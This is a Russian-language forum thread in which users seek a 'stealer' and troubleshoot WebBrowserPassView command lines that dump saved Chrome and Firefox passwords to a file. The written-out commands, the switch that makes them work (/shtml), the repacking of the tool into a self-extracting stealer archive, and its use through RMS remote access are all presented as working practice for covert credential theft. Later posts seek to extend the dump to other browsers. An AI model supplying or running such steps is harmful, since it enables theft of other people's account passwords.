• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Ребят, подскажите стиллер с сохранением лога на компьютере


S@ltyk

Пользователь
Форумчанин
Регистрация
29.04.2015
Сообщения
12
Репутация
2
ав просто так не дает себя выключить , и службы тоже , а на счет WebBrowserPassView знаю про большой детект, но почему то тот же ESET не как у меня на нее не реагирует , а на счет команд на оф сайте, нифига не работает :D я уже часа 3 изобретаю велосипед с этими командами, просто отказывается сохранять файл паролей
вот например ввожу
WebBrowserPassView.exe /UseChromeProfileFolder 1 /ChromeProfileFolder "
C:\Users\система\AppData\Local\Google\Chrome\User Data\Default" /stext pass.txt
тупо открывается окно этой программы , вместо выполения команд, которые я написал, будто бы я просто написал start WebBrowserPassView.exe
WebBrowserPassView.exe /UseFirefoxProfileFolder 1 /FirefoxProfileFolder
"C:\Users\система\AppData\Local\ Mozilla\Firefox\Profiles\7a2ttm2u.default" - аналогично и тут, просто открывается окно программы, вообщем не могу понять в чем проблема
С командами так и не получилось разобраться?
Не работают они?


Да ты и сам бы мог извлечь.Пароль в комментарии в свойствах архива.
Пасс на архив в аттаче:111

Из-за хайда не могу скачать оригинальный архив от Kama_pilua. Но смог скачать ваши файлы.
Упаковал их обратно в sfx...при запуске выдает два окна с ошибкой. После чего в %appdata% появляется пустой файл x.7zip
Просьба помочь разобраться со стиллером.
 

Вложения

  • 1.PNG
    1.PNG
    21.3 КБ · Просмотры: 48
Последнее редактирование:

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
С командами так и не получилось разобраться?
Не работают они?




Из-за хайда не могу скачать оригинальный архив от Kama_pilua. Но смог скачать ваши файлы.
Упаковал их обратно в sfx...при запуске выдает два окна с ошибкой. После чего в %appdata% появляется пустой файл x.7zip
Просьба помочь разобраться со стиллером.
достал себе из файла который любезно предоставил Kama_pulia WebBrowserPassView и ничего не перепаковывал, так и использую, потому что юзаю в свяезке с рмс и есть доступ к командной строке:)
а команды там не работали, потому что пару версий назад вырезали поддержку командной строки в WebBrowserPassView(вычитал на сайте), я так и не нагуглил более старую версию, везде можно скачать только последнюю версию, в итоге вытащил из файла WebBrowserPassView более старой версии и очень доволен:)
 

S@ltyk

Пользователь
Форумчанин
Регистрация
29.04.2015
Сообщения
12
Репутация
2
достал себе из файла который любезно предоставил Kama_pulia WebBrowserPassView и ничего не перепаковывал, так и использую, потому что юзаю в связке с рмс и есть доступ к командной строке:)

WebBrowserPassView отлично работает, проверил. Через rms каким образом используешь?
запускаешь через командную строку и появляется окно интерфейса, или в файле который предоставил Kama_pulia версия которая поддерживает cmd?
 

S@ltyk

Пользователь
Форумчанин
Регистрация
29.04.2015
Сообщения
12
Репутация
2
WebBrowserPassView отлично работает, проверил. Через rms каким образом используешь?
запускаешь через командную строку и появляется окно интерфейса, или в файле который предоставил Kama_pulia версия которая поддерживает cmd?
Все, разобрался. Пытался сохранить в текст через /stext, оказалось что работает через /shtml.
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
а можно ли через WebBrowserPassView открывать пароли от яндекс браузера, хромиума, орбитума браузеров ? мб какие команды дополнительно вводить, там же по сути тот же хром, только путь разный к паролям
 

S@ltyk

Пользователь
Форумчанин
Регистрация
29.04.2015
Сообщения
12
Репутация
2
а можно ли через WebBrowserPassView открывать пароли от яндекс браузера, хромиума, орбитума браузеров ? мб какие команды дополнительно вводить, там же по сути тот же хром, только путь разный к паролям
На сколько я понял, из описания на сайте надо с дополнительными параметрами включать.
Мне кажется надо так WebBrowserPassView.exe /UseChromeProfileFolder <1> /ChromeProfileFolder "путь к профилю"
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
уже попробовал, там в самой программе можно менять путь к профилю браузера, заменил на путь к профилю яндекс браузера - не работает, не читает пароли
 
Верх Низ